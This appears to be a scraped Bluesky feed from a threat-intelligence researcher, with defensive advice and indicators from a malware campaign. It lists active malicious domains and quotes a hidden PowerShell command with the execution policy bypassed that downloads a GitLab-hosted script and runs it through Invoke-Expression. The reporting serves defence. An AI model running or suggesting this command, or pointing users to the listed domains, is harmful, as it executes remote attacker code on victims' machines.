ciphexe //infosec
@ciphexe.bsky.social
cyber security specialist / double dad / CTI
Embarrassing stuff 😬
February 14, 2025 at 8:31 PM
Embarrassing stuff 😬
It is advised to verify domains before downloading software. Use Threat Intelligence tools to identify high-risk domains. Developers should validate packages before using third-party tools.
Source 🔗:
Source 🔗:
February 14, 2025 at 8:30 PM
It is advised to verify domains before downloading software. Use Threat Intelligence tools to identify high-risk domains. Developers should validate packages before using third-party tools.
Source 🔗:
Source 🔗:
The group often exploits known vulnerabilities such as the MoveIT Transfer vulnerability. To address the techniques used by the group it is advised to: Regularly update software (high risk being internet faced), implement IDS and anomaly detection, Awareness training and data backup policy.
Source🔗:
Source🔗:
February 13, 2025 at 9:56 AM
The group often exploits known vulnerabilities such as the MoveIT Transfer vulnerability. To address the techniques used by the group it is advised to: Regularly update software (high risk being internet faced), implement IDS and anomaly detection, Awareness training and data backup policy.
Source🔗:
Source🔗:
Maybe relevant to you: @thetimesofisrael.bsky.social ?
January 29, 2025 at 9:55 PM
Maybe relevant to you: @thetimesofisrael.bsky.social ?
URLs seem to follow a feedbackguest[NUMBER].world
- Example of active malicious URLS:
feedbackguest485121.world
feedbackguest485100.world
reportguest4893921.world
- Example of active malicious URLS:
feedbackguest485121.world
feedbackguest485100.world
reportguest4893921.world
January 21, 2025 at 10:23 PM
URLs seem to follow a feedbackguest[NUMBER].world
- Example of active malicious URLS:
feedbackguest485121.world
feedbackguest485100.world
reportguest4893921.world
- Example of active malicious URLS:
feedbackguest485121.world
feedbackguest485100.world
reportguest4893921.world
PS command:
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$hl = (Invoke-WebRequest -Uri 'https://gitlab.com/pnp30/svn/-/raw/main/deploy.md' -UseBasicParsing).Content; Invoke-Expression -Command $hl"
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$hl = (Invoke-WebRequest -Uri 'https://gitlab.com/pnp30/svn/-/raw/main/deploy.md' -UseBasicParsing).Content; Invoke-Expression -Command $hl"
January 21, 2025 at 10:23 PM
PS command:
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$hl = (Invoke-WebRequest -Uri 'https://gitlab.com/pnp30/svn/-/raw/main/deploy.md' -UseBasicParsing).Content; Invoke-Expression -Command $hl"
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$hl = (Invoke-WebRequest -Uri 'https://gitlab.com/pnp30/svn/-/raw/main/deploy.md' -UseBasicParsing).Content; Invoke-Expression -Command $hl"